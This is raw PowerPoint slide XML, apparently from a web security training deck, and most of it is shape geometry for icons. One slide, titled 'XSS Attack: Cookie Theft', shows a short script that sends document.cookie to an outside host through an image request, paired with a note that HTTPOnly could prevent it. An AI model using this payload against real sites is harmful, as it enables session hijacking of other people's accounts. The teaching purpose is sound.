                  <a:gd name="connsiteX1" fmla="*/ 0 w 1058299"/>
                  <a:gd name="connsiteY1" fmla="*/ 952418 h 2845497"/>
                  <a:gd name="connsiteX2" fmla="*/ 11759 w 1058299"/>
                  <a:gd name="connsiteY2" fmla="*/ 2845497 h 2845497"/>
                </a:gdLst>
                <a:ahLst/>
                <a:cxnLst>
                  <a:cxn ang="0">
                    <a:pos x="connsiteX0" y="connsiteY0"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="connsiteX1" y="connsiteY1"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="connsiteX2" y="connsiteY2"/>
                  </a:cxn>
                </a:cxnLst>
                <a:rect l="l" t="t" r="r" b="b"/>
                <a:pathLst>
                  <a:path w="1058299" h="2845497">
                    <a:moveTo>
                      <a:pt x="1058299" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="952418"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="3920" y="1583444"/>
                      <a:pt x="7839" y="2214471"/>
                      <a:pt x="11759" y="2845497"/>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26630400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ChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="462250" y="1508986"/>
            <a:ext cx="7850094" cy="265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74" tIns="32137" rIns="64274" bIns="32137">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>&lt;script&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" err="1">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" err="1">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>badURL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>='https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" err="1">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>manicode.com?data</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>=' + uriEncode(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" err="1">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>document.cookie)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>new Image()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" err="1">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>.src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" err="1">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>badURL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>&lt;/script&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Title 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>XSS Attack: Cookie Theft</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="3" name="Group 2"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1528124" y="4635445"/>
            <a:ext cx="5850817" cy="1471762"/>
            <a:chOff x="1528124" y="4294488"/>
            <a:chExt cx="5850817" cy="1471762"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="5" name="TextBox 4"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1528124" y="4796276"/>
              <a:ext cx="4170167" cy="461665"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0" anchor="ctr">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="r"/>
              <a:r>
                <a:rPr lang="en-US" sz="2400" err="1">
                  <a:solidFill>
                    <a:schemeClr val="accent1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>HTTPOnly</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2400">
                  <a:solidFill>
                    <a:schemeClr val="accent1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t> could prevent this!</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="7" name="Group 6"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="5907179" y="4294488"/>
              <a:ext cx="1471762" cy="1471762"/>
              <a:chOff x="4785865" y="3560220"/>
              <a:chExt cx="1260755" cy="1260755"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="8" name="Oval 7"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4785865" y="3560220"/>
                <a:ext cx="1260755" cy="1260755"/>
              </a:xfrm>
              <a:prstGeom prst="ellipse">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="DB3D16"/>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1"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4979235" y="3814252"/>
                <a:ext cx="888446" cy="708458"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 10094 w 24531"/>
                  <a:gd name="T1" fmla="*/ 1812 h 19562"/>
                  <a:gd name="T2" fmla="*/ 23718 w 24531"/>
                  <a:gd name="T3" fmla="*/ 4125 h 19562"/>
                  <a:gd name="T4" fmla="*/ 2156 w 24531"/>
                  <a:gd name="T5" fmla="*/ 18718 h 19562"/>
                  <a:gd name="T6" fmla="*/ 2156 w 24531"/>
                  <a:gd name="T7" fmla="*/ 2469 h 19562"/>
                  <a:gd name="T8" fmla="*/ 3469 w 24531"/>
                  <a:gd name="T9" fmla="*/ 812 h 19562"/>
                  <a:gd name="T10" fmla="*/ 9125 w 24531"/>
                  <a:gd name="T11" fmla="*/ 0 h 19562"/>
                  <a:gd name="T12" fmla="*/ 0 w 24531"/>
                  <a:gd name="T13" fmla="*/ 4125 h 19562"/>
                  <a:gd name="T14" fmla="*/ 22374 w 24531"/>
                  <a:gd name="T15" fmla="*/ 19561 h 19562"/>
                  <a:gd name="T16" fmla="*/ 22374 w 24531"/>
                  <a:gd name="T17" fmla="*/ 1656 h 19562"/>
                  <a:gd name="T18" fmla="*/ 9125 w 24531"/>
                  <a:gd name="T19" fmla="*/ 812 h 19562"/>
                  <a:gd name="T20" fmla="*/ 15999 w 24531"/>
                  <a:gd name="T21" fmla="*/ 8031 h 19562"/>
                  <a:gd name="T22" fmla="*/ 17311 w 24531"/>
                  <a:gd name="T23" fmla="*/ 7219 h 19562"/>
                  <a:gd name="T24" fmla="*/ 16405 w 24531"/>
                  <a:gd name="T25" fmla="*/ 10874 h 19562"/>
                  <a:gd name="T26" fmla="*/ 17218 w 24531"/>
                  <a:gd name="T27" fmla="*/ 10405 h 19562"/>
                  <a:gd name="T28" fmla="*/ 13218 w 24531"/>
                  <a:gd name="T29" fmla="*/ 6219 h 19562"/>
                  <a:gd name="T30" fmla="*/ 13999 w 24531"/>
                  <a:gd name="T31" fmla="*/ 5750 h 19562"/>
                  <a:gd name="T32" fmla="*/ 15718 w 24531"/>
                  <a:gd name="T33" fmla="*/ 3562 h 19562"/>
                  <a:gd name="T34" fmla="*/ 4094 w 24531"/>
                  <a:gd name="T35" fmla="*/ 10561 h 19562"/>
                  <a:gd name="T36" fmla="*/ 9875 w 24531"/>
                  <a:gd name="T37" fmla="*/ 17843 h 19562"/>
                  <a:gd name="T38" fmla="*/ 19374 w 24531"/>
                  <a:gd name="T39" fmla="*/ 6219 h 19562"/>
                  <a:gd name="T40" fmla="*/ 8687 w 24531"/>
                  <a:gd name="T41" fmla="*/ 16843 h 19562"/>
                  <a:gd name="T42" fmla="*/ 9562 w 24531"/>
                  <a:gd name="T43" fmla="*/ 6906 h 19562"/>
                  <a:gd name="T44" fmla="*/ 10031 w 24531"/>
                  <a:gd name="T45" fmla="*/ 6906 h 19562"/>
                  <a:gd name="T46" fmla="*/ 10656 w 24531"/>
                  <a:gd name="T47" fmla="*/ 6968 h 19562"/>
                  <a:gd name="T48" fmla="*/ 14155 w 24531"/>
                  <a:gd name="T49" fmla="*/ 9312 h 19562"/>
                  <a:gd name="T50" fmla="*/ 14624 w 24531"/>
                  <a:gd name="T51" fmla="*/ 13499 h 19562"/>
                  <a:gd name="T52" fmla="*/ 14155 w 24531"/>
                  <a:gd name="T53" fmla="*/ 14561 h 19562"/>
                  <a:gd name="T54" fmla="*/ 19218 w 24531"/>
                  <a:gd name="T55" fmla="*/ 10499 h 19562"/>
                  <a:gd name="T56" fmla="*/ 15468 w 24531"/>
                  <a:gd name="T57" fmla="*/ 13811 h 19562"/>
                  <a:gd name="T58" fmla="*/ 15593 w 24531"/>
                  <a:gd name="T59" fmla="*/ 13311 h 19562"/>
                  <a:gd name="T60" fmla="*/ 10875 w 24531"/>
                  <a:gd name="T61" fmla="*/ 6125 h 19562"/>
                  <a:gd name="T62" fmla="*/ 10469 w 24531"/>
                  <a:gd name="T63" fmla="*/ 6062 h 19562"/>
                  <a:gd name="T64" fmla="*/ 18624 w 24531"/>
                  <a:gd name="T65" fmla="*/ 6687 h 19562"/>
                  <a:gd name="T66" fmla="*/ 12686 w 24531"/>
                  <a:gd name="T67" fmla="*/ 12749 h 19562"/>
                  <a:gd name="T68" fmla="*/ 13499 w 24531"/>
                  <a:gd name="T69" fmla="*/ 14061 h 19562"/>
                  <a:gd name="T70" fmla="*/ 10375 w 24531"/>
                  <a:gd name="T71" fmla="*/ 7750 h 19562"/>
                  <a:gd name="T72" fmla="*/ 11187 w 24531"/>
                  <a:gd name="T73" fmla="*/ 9062 h 19562"/>
                  <a:gd name="T74" fmla="*/ 7375 w 24531"/>
                  <a:gd name="T75" fmla="*/ 10561 h 19562"/>
                  <a:gd name="T76" fmla="*/ 8156 w 24531"/>
                  <a:gd name="T77" fmla="*/ 11905 h 19562"/>
                  <a:gd name="T78" fmla="*/ 13311 w 24531"/>
                  <a:gd name="T79" fmla="*/ 10530 h 19562"/>
                  <a:gd name="T80" fmla="*/ 13780 w 24531"/>
                  <a:gd name="T81" fmla="*/ 11311 h 19562"/>
                  <a:gd name="T82" fmla="*/ 9812 w 24531"/>
                  <a:gd name="T83" fmla="*/ 11030 h 19562"/>
                  <a:gd name="T84" fmla="*/ 10281 w 24531"/>
                  <a:gd name="T85" fmla="*/ 11843 h 19562"/>
                  <a:gd name="T86" fmla="*/ 9437 w 24531"/>
                  <a:gd name="T87" fmla="*/ 14124 h 19562"/>
                  <a:gd name="T88" fmla="*/ 9906 w 24531"/>
                  <a:gd name="T89" fmla="*/ 14905 h 19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31" h="19562">
                    <a:moveTo>
                      <a:pt x="9125" y="812"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="9125" y="812"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="9781" y="812"/>
                      <a:pt x="10094" y="1156"/>
                      <a:pt x="10094" y="1812"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="10094" y="1812"/>
                      <a:pt x="10094" y="1812"/>
                      <a:pt x="10094" y="2469"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="10094" y="2469"/>
                      <a:pt x="10094" y="2469"/>
                      <a:pt x="22374" y="2469"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="23061" y="2469"/>
                      <a:pt x="23718" y="3125"/>
                      <a:pt x="23718" y="4125"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="23718" y="4125"/>
                      <a:pt x="23718" y="4125"/>
                      <a:pt x="23718" y="17405"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="23718" y="18061"/>
                      <a:pt x="23061" y="18718"/>
                      <a:pt x="22374" y="18718"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="22374" y="18718"/>
                      <a:pt x="22374" y="18718"/>
                      <a:pt x="2156" y="18718"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1469" y="18718"/>
                      <a:pt x="812" y="18061"/>
                      <a:pt x="812" y="17405"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="812" y="17405"/>
                      <a:pt x="812" y="17405"/>
                      <a:pt x="812" y="4125"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="812" y="3125"/>
                      <a:pt x="1469" y="2469"/>
                      <a:pt x="2156" y="2469"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="2156" y="2469"/>
                      <a:pt x="2156" y="2469"/>
                      <a:pt x="2812" y="2469"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="2812" y="2469"/>
                      <a:pt x="2812" y="2469"/>
                      <a:pt x="2812" y="1812"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="2812" y="1156"/>
                      <a:pt x="3125" y="812"/>
                      <a:pt x="3469" y="812"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="3469" y="812"/>
                      <a:pt x="3469" y="812"/>
                      <a:pt x="9125" y="812"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="9125" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9125" y="0"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="3469" y="0"/>
                      <a:pt x="3469" y="0"/>
                      <a:pt x="3469" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="2750" y="0"/>
                      <a:pt x="2031" y="562"/>
                      <a:pt x="2000" y="1656"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="875" y="1750"/>
                      <a:pt x="0" y="2812"/>
                      <a:pt x="0" y="4125"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="17405"/>
                      <a:pt x="0" y="17405"/>
                      <a:pt x="0" y="17405"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="18530"/>
                      <a:pt x="1000" y="19561"/>
                      <a:pt x="2156" y="19561"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="22374" y="19561"/>
                      <a:pt x="22374" y="19561"/>
                      <a:pt x="22374" y="19561"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="23499" y="19561"/>
                      <a:pt x="24530" y="18530"/>
                      <a:pt x="24530" y="17405"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="24530" y="4125"/>
                      <a:pt x="24530" y="4125"/>
                      <a:pt x="24530" y="4125"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="24530" y="2750"/>
                      <a:pt x="23561" y="1656"/>
                      <a:pt x="22374" y="1656"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="10937" y="1656"/>
                      <a:pt x="10937" y="1656"/>
                      <a:pt x="10937" y="1656"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="10875" y="625"/>
                      <a:pt x="10187" y="0"/>
                      <a:pt x="9125" y="0"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="9125" y="812"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="17311" y="7219"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="17311" y="7219"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="16718" y="7094"/>
                      <a:pt x="16124" y="7468"/>
                      <a:pt x="15999" y="8031"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="15843" y="8625"/>
                      <a:pt x="16218" y="9219"/>
                      <a:pt x="16811" y="9375"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="17374" y="9500"/>
                      <a:pt x="17968" y="9156"/>
                      <a:pt x="18124" y="8562"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="18249" y="7969"/>
                      <a:pt x="17905" y="7375"/>
                      <a:pt x="17311" y="7219"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="17218" y="10405"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="17218" y="10405"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="16843" y="10311"/>
                      <a:pt x="16499" y="10530"/>
                      <a:pt x="16405" y="10874"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="16311" y="11218"/>
                      <a:pt x="16530" y="11593"/>
                      <a:pt x="16905" y="11655"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="17249" y="11749"/>
                      <a:pt x="17593" y="11530"/>
                      <a:pt x="17686" y="11186"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="17780" y="10843"/>
                      <a:pt x="17561" y="10468"/>
                      <a:pt x="17218" y="10405"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="13999" y="5750"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="13999" y="5750"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="13655" y="5656"/>
                      <a:pt x="13280" y="5875"/>
                      <a:pt x="13218" y="6219"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="13124" y="6594"/>
                      <a:pt x="13343" y="6937"/>
                      <a:pt x="13686" y="7031"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="14030" y="7094"/>
                      <a:pt x="14405" y="6875"/>
                      <a:pt x="14499" y="6531"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="14561" y="6187"/>
                      <a:pt x="14343" y="5844"/>
                      <a:pt x="13999" y="5750"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="19374" y="6219"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="19374" y="6219"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="18530" y="4875"/>
                      <a:pt x="17249" y="3937"/>
                      <a:pt x="15718" y="3562"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="15249" y="3469"/>
                      <a:pt x="14780" y="3406"/>
                      <a:pt x="14311" y="3406"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="12343" y="3406"/>
                      <a:pt x="10500" y="4406"/>
                      <a:pt x="9406" y="6031"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="6844" y="6219"/>
                      <a:pt x="4719" y="8031"/>
                      <a:pt x="4094" y="10561"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="3719" y="12093"/>
                      <a:pt x="3969" y="13686"/>
                      <a:pt x="4812" y="15030"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="5625" y="16374"/>
                      <a:pt x="6937" y="17311"/>
                      <a:pt x="8469" y="17686"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="8937" y="17811"/>
                      <a:pt x="9406" y="17843"/>
                      <a:pt x="9875" y="17843"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="11906" y="17843"/>
                      <a:pt x="13718" y="16843"/>
                      <a:pt x="14780" y="15218"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="17311" y="15030"/>
                      <a:pt x="19468" y="13186"/>
                      <a:pt x="20061" y="10718"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="20436" y="9156"/>
                      <a:pt x="20186" y="7594"/>
                      <a:pt x="19374" y="6219"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="9875" y="16968"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="9875" y="16968"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="9469" y="16968"/>
                      <a:pt x="9062" y="16936"/>
                      <a:pt x="8687" y="16843"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="7375" y="16530"/>
                      <a:pt x="6250" y="15718"/>
                      <a:pt x="5562" y="14561"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="4844" y="13405"/>
                      <a:pt x="4656" y="12061"/>
                      <a:pt x="4969" y="10749"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="5500" y="8594"/>
                      <a:pt x="7344" y="7031"/>
                      <a:pt x="9562" y="6906"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="9656" y="6906"/>
                      <a:pt x="9656" y="6906"/>
                      <a:pt x="9656" y="6906"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="9781" y="6906"/>
                      <a:pt x="9875" y="6906"/>
                      <a:pt x="10000" y="6906"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="10000" y="6906"/>
                      <a:pt x="10000" y="6906"/>
                      <a:pt x="10031" y="6906"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="10125" y="6906"/>
                      <a:pt x="10219" y="6906"/>
                      <a:pt x="10312" y="6937"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="10344" y="6937"/>
                      <a:pt x="10344" y="6937"/>
                      <a:pt x="10375" y="6937"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="10469" y="6937"/>
                      <a:pt x="10562" y="6968"/>
                      <a:pt x="10656" y="6968"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="10656" y="6968"/>
                      <a:pt x="10687" y="6968"/>
                      <a:pt x="10719" y="6968"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="10812" y="7000"/>
                      <a:pt x="10937" y="7031"/>
                      <a:pt x="11031" y="7031"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="12343" y="7344"/>
                      <a:pt x="13436" y="8156"/>
                      <a:pt x="14155" y="9312"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="14843" y="10468"/>
                      <a:pt x="15061" y="11811"/>
                      <a:pt x="14749" y="13124"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="14718" y="13249"/>
                      <a:pt x="14686" y="13343"/>
                      <a:pt x="14655" y="13468"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="14655" y="13499"/>
                      <a:pt x="14655" y="13499"/>
                      <a:pt x="14624" y="13499"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="14593" y="13624"/>
                      <a:pt x="14561" y="13749"/>
                      <a:pt x="14499" y="13843"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="14499" y="13874"/>
                      <a:pt x="14499" y="13874"/>
                      <a:pt x="14499" y="13874"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="14405" y="14093"/>
                      <a:pt x="14280" y="14343"/>
                      <a:pt x="14155" y="14561"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="14061" y="14686"/>
                      <a:pt x="14061" y="14686"/>
                      <a:pt x="14061" y="14686"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="13155" y="16092"/>
                      <a:pt x="11594" y="16968"/>
                      <a:pt x="9875" y="16968"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="19218" y="10499"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="19218" y="10499"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="18749" y="12405"/>
                      <a:pt x="17186" y="13874"/>
                      <a:pt x="15311" y="14249"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="15374" y="14093"/>
                      <a:pt x="15405" y="13968"/>
                      <a:pt x="15468" y="13811"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="15468" y="13780"/>
                      <a:pt x="15468" y="13749"/>
                      <a:pt x="15499" y="13749"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="15499" y="13686"/>
                      <a:pt x="15530" y="13624"/>
                      <a:pt x="15530" y="13561"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="15561" y="13499"/>
                      <a:pt x="15593" y="13405"/>
                      <a:pt x="15593" y="13311"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="15968" y="11780"/>
                      <a:pt x="15718" y="10186"/>
                      <a:pt x="14905" y="8844"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="14093" y="7500"/>
                      <a:pt x="12780" y="6562"/>
                      <a:pt x="11250" y="6187"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="11125" y="6156"/>
                      <a:pt x="11000" y="6125"/>
                      <a:pt x="10875" y="6125"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="10844" y="6094"/>
                      <a:pt x="10812" y="6094"/>
                      <a:pt x="10812" y="6094"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="10687" y="6094"/>
                      <a:pt x="10594" y="6062"/>
                      <a:pt x="10500" y="6062"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="10500" y="6062"/>
                      <a:pt x="10500" y="6062"/>
                      <a:pt x="10469" y="6062"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="11437" y="4937"/>
                      <a:pt x="12843" y="4281"/>
                      <a:pt x="14311" y="4281"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="14718" y="4281"/>
                      <a:pt x="15093" y="4344"/>
                      <a:pt x="15499" y="4437"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="16811" y="4750"/>
                      <a:pt x="17905" y="5531"/>
                      <a:pt x="18624" y="6687"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="19311" y="7844"/>
                      <a:pt x="19530" y="9187"/>
                      <a:pt x="19218" y="10499"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="12686" y="12749"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="12686" y="12749"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="12094" y="12593"/>
                      <a:pt x="11500" y="12968"/>
                      <a:pt x="11375" y="13530"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="11219" y="14124"/>
                      <a:pt x="11594" y="14718"/>
                      <a:pt x="12187" y="14874"/>
